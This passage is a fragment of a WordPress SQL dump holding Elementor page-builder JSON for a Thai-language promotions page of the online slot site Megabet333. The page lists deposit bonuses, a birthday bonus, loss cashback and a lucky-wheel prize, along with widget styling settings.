(\\u0e2a\\u0e48\\u0e27\\u0e19\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a)<\\/strong> \\u0e2d\\u0e2d\\u0e01\\u0e42\\u0e14\\u0e22\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34 \\u0e40\\u0e2b\\u0e25\\u0e37\\u0e2d\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e07\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e16\\u0e2d\\u0e19<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c <strong data-start=\\\"945\\\" data-end=\\\"967\\\">1 \\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\/\\u0e27\\u0e31\\u0e19\\/\\u0e1c\\u0e39\\u0e49\\u0e43\\u0e0a\\u0e49<\\/strong><\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"82869dd\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"174fb16\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"ae3dca7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Happy Birthday Bonus \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d7acfa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"1415\\\" data-end=\\\"1466\\\">\\ud83c\\udf81 \\u0e09\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e01\\u0e34\\u0e14 \\u0e23\\u0e31\\u0e1a\\u0e02\\u0e2d\\u0e07\\u0e02\\u0e27\\u0e31\\u0e0d\\u0e15\\u0e32\\u0e21\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e20\\u0e32\\u0e22\\u0e43\\u0e19\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19\\u0e19\\u0e31\\u0e49\\u0e19 <br \\/>(\\u0e23\\u0e31\\u0e1a\\u0e44\\u0e14\\u0e49\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e01\\u0e34\\u0e14)<\\/p><ul><li data-start=\\\"1469\\\" data-end=\\\"1515\\\">\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21 <strong data-start=\\\"1480\\\" data-end=\\\"1496\\\">3,000 \\u0e02\\u0e36\\u0e49\\u0e19\\u0e44\\u0e1b<\\/strong> \\u2192 <strong data-start=\\\"1499\\\" data-end=\\\"1513\\\">\\u0e23\\u0e31\\u0e1a\\u0e1f\\u0e23\\u0e35 300<\\/strong><\\/li><li data-start=\\\"1469\\\" data-end=\\\"1515\\\">\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21 <strong data-start=\\\"1529\\\" data-end=\\\"1542\\\">500\\u20132,999<\\/strong> \\u2192 <strong data-start=\\\"1545\\\" data-end=\\\"1555\\\">\\u0e23\\u0e31\\u0e1a 50<\\/strong><\\/li><li data-start=\\\"1469\\\" data-end=\\\"1515\\\">\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21 <strong data-start=\\\"1571\\\" data-end=\\\"1586\\\">\\u0e44\\u0e21\\u0e48\\u0e40\\u0e01\\u0e34\\u0e19 500<\\/strong> \\u2192 <strong data-start=\\\"1589\\\" data-end=\\\"1616\\\">\\u0e1d\\u0e32\\u0e01\\u0e40\\u0e17\\u0e48\\u0e32\\u0e44\\u0e23 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 100%<\\/strong><\\/li><\\/ul><p data-start=\\\"271\\\" data-end=\\\"387\\\"><span style=\\\"text-decoration: underline;\\\"><strong data-start=\\\"371\\\" data-end=\\\"387\\\">\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"1634\\\" data-end=\\\"1680\\\"><strong data-start=\\\"1634\\\" data-end=\\\"1653\\\">\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 5 \\u0e40\\u0e17\\u0e48\\u0e32<\\/strong>, <strong data-start=\\\"1655\\\" data-end=\\\"1678\\\">\\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 3 \\u0e40\\u0e17\\u0e48\\u0e32<\\/strong><\\/li><li data-start=\\\"1634\\\" data-end=\\\"1680\\\">\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e42\\u0e14\\u0e22 <strong data-start=\\\"1699\\\" data-end=\\\"1727\\\">\\u0e41\\u0e08\\u0e49\\u0e07\\u0e1a\\u0e31\\u0e15\\u0e23\\u0e1b\\u0e23\\u0e30\\u0e0a\\u0e32\\u0e0a\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e41\\u0e2d\\u0e14\\u0e21\\u0e34\\u0e19<\\/strong><\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e97b605\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9947189\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"b558a2e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"54c71af\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 10%\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"234d7b8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"1088\\\" data-end=\\\"1118\\\">\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e44\\u0e21\\u0e48\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e1b\\u0e25\\u0e48\\u0e32! \\u0e23\\u0e30\\u0e1a\\u0e1a <strong data-start=\\\"1844\\\" data-end=\\\"1878\\\">\\u0e41\\u0e1b\\u0e25\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e41\\u0e15\\u0e49\\u0e21 Reward 10%<\\/strong> <br \\/>\\u0e19\\u0e33\\u0e41\\u0e15\\u0e49\\u0e21\\u0e44\\u0e1b\\u0e25\\u0e38\\u0e49\\u0e19\\u0e43\\u0e2b\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e08\\u0e30\\u0e41\\u0e25\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e01\\u0e47\\u0e44\\u0e14\\u0e49 \\u0e43\\u0e19\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e41\\u0e25\\u0e01\\u0e41\\u0e15\\u0e49\\u0e21<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"1936\\\" data-end=\\\"1990\\\">\\u0e04\\u0e34\\u0e14\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e1b\\u0e2d\\u0e23\\u0e4c\\u0e40\\u0e0b\\u0e47\\u0e19\\u0e15\\u0e4c\\u0e08\\u0e32\\u0e01\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e2a\\u0e38\\u0e17\\u0e18\\u0e34 \\u0e15\\u0e32\\u0e21\\u0e23\\u0e2d\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e01\\u0e33\\u0e2b\\u0e19\\u0e14<\\/li><li data-start=\\\"1936\\\" data-end=\\\"1990\\\">\\u0e41\\u0e15\\u0e49\\u0e21\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e40\\u0e07\\u0e34\\u0e19\\u0e2a\\u0e14\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07 \\u0e15\\u0e49\\u0e2d\\u0e07\\u0e19\\u0e33\\u0e44\\u0e1b\\u0e41\\u0e25\\u0e01\\u0e15\\u0e32\\u0e21\\u0e23\\u0e32\\u0e22\\u0e01\\u0e32\\u0e23\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e25\\u0e01\\u0e43\\u0e19\\u0e02\\u0e13\\u0e30\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5ce39e5\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"21cd1ab\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"6b5fc02\",\"elType\":\"widget\",\"settings\":{\"title\":\"Lucky Wheel \\u0e01\\u0e07\\u0e25\\u0e49\\u0e2d\\u0e40\\u0e2a\\u0e35\\u0e48\\u0e22\\u0e07\\u0e42\\u0e0a\\u0e04 \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a328cdd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"1415\\\" data-end=\\\"1466\\\">\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e38\\u0e01\\u0e27\\u0e31\\u0e19\\u0e14\\u0e49\\u0e27\\u0e22\\u0e41\\u0e15\\u0e49\\u0e21 <strong data-start=\\\"75\\\" data-end=\\\"85\\\">Reward<\\/strong> \\u0e02\\u0e2d\\u0e07\\u0e04\\u0e38\\u0e13 <br \\/>\\u0e40\\u0e1b\\u0e25\\u0e35\\u0e48\\u0e22\\u0e19\\u0e41\\u0e15\\u0e49\\u0e21\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2b\\u0e21\\u0e38\\u0e19 \\u0e41\\u0e25\\u0e49\\u0e27\\u0e23\\u0e31\\u0e1a\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35\\u0e2b\\u0e25\\u0e31\\u0e07\\u0e08\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19<\\/p><p data-start=\\\"271\\\" data-end=\\\"387\\\"><span style=\\\"text-decoration: underline;\\\"><strong data-start=\\\"371\\\" data-end=\\\"387\\\">\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"197\\\" data-end=\\\"252\\\"><strong data-start=\\\"197\\\" data-end=\\\"250\\\">20 \\/ 50 \\/ 100 \\/ 150 \\/ 200 \\/ 250 \\/ 300 \\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a<\\/strong><\\/li><li data-start=\\\"197\\\" data-end=\\\"252\\\"><strong data-start=\\\"255\\\" data-end=\\\"275\\\">\\ud83c\\udf81 Mystery Prize<\\/strong>\\u00a0\\u0e2a\\u0e38\\u0e48\\u0e21\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29 (\\u0e40\\u0e0a\\u0e48\\u0e19 500 \\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15 <strong data-start=\\\"310\\\" data-end=\\\"318\\\">\\u0e2b\\u0e23\\u0e37\\u0e2d<\\/strong> \\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 +1)<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5aae432\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false}]'),(498,83,'_elementor_edit_mode','builder'),(499,83,'_elementor_template_type','wp-page'),(500,83,'_elementor_version','3.32.5'),(501,83,'_elementor_pro_version','3.32.3'),(502,83,'_wp_page_template','default'),(503,83,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(504,83,'_elementor_data','[{\"id\":\"d070aea\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"4d6b9b4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"db612d4\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 Megabet333 \\u0e23\\u0e27\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1f\\u0e23\\u0e35 100% \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aff2186\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-start=\\\"346\\\" data-end=\\\"760\\\">\\u0e16\\u0e49\\u0e32\\u0e1e\\u0e39\\u0e14\\u0e16\\u0e36\\u0e07\\u0e2a\\u0e34\\u0e48\\u0e07\\u0e17\\u0e35\\u0e48\\u0e14\\u0e36\\u0e07\\u0e14\\u0e39\\u0e14\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c megabet \\u0e21\\u0e32\\u0e01\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e01\\u0e47\\u0e04\\u0e07\\u0e2b\\u0e19\\u0e35\\u0e44\\u0e21\\u0e48\\u0e1e\\u0e49\\u0e19 \\u201c<strong>\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15<\\/strong>\\u201d \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e15\\u0e31\\u0e27\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e2a\\u0e33\\u0e04\\u0e31\\u0e0d\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e44\\u0e1b\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e01\\u0e31\\u0e19 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e1e\\u0e19\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e08\\u0e36\\u0e07\\u0e41\\u0e02\\u0e48\\u0e07\\u0e02\\u0e31\\u0e19\\u0e01\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e01\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e40\\u0e14\\u0e47\\u0e14 \\u0e46 \\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e2d\\u0e32\\u0e43\\u0e08\\u0e19\\u0e31\\u0e01\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e17\\u0e38\\u0e01\\u0e01\\u0e25\\u0e38\\u0e48\\u0e21 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33 \\u0e15\\u0e48\\u0e32\\u0e07\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e35\\u0e48 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e16\\u0e49\\u0e32\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e42\\u0e1b\\u0e23\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e41\\u0e25\\u0e30\\u0e41\\u0e08\\u0e01\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e21\\u0e32\\u0e01\\u0e02\\u0e36\\u0e49\\u0e19\\u0e01\\u0e27\\u0e48\\u0e32\\u0e17\\u0e35\\u0e48\\u0e40\\u0e04\\u0e22 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e1e\\u0e19\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c\\u0e43\\u0e19\\u0e1b\\u0e31\\u0e08\\u0e08\\u0e38\\u0e1a\\u0e31\\u0e19\\u0e44\\u0e21\\u0e48\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07\\u0e41\\u0e15\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e08\\u0e32\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e19\\u0e33\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e41\\u0e15\\u0e48\\u0e22\\u0e31\\u0e07\\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e04\\u0e23\\u0e2d\\u0e1a\\u0e04\\u0e25\\u0e38\\u0e21\\u0e17\\u0e38\\u0e01\\u0e0a\\u0e48\\u0e27\\u0e07\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01 \\u0e1d\\u0e32\\u0e01\\u0e40\\u0e07\\u0e34\\u0e19 \\u0e16\\u0e2d\\u0e19\\u0e40\\u0e07\\u0e34\\u0e19 \\u0e44\\u0e1b\\u0e08\\u0e19\\u0e16\\u0e36\\u0e07\\u0e42\\u0e1b\\u0e23\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 \\u0e0b\\u0e36\\u0e48\\u0e07\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2b\\u0e21\\u0e14\\u0e19\\u0e35\\u0e49\\u0e16\\u0e37\\u0e2d\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e2d\\u0e07\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e17\\u0e38\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e25\\u0e07\\u0e17\\u0e38\\u0e19\\u0e40\\u0e22\\u0e2d\\u0e30 \\u0e41\\u0e16\\u0e21\\u0e22\\u0e31\\u0e07\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e44\\u0e14\\u0e49\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"36a351d\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"77587d0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"f1ccc77\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23 20 \\u0e23\\u0e31\\u0e1a 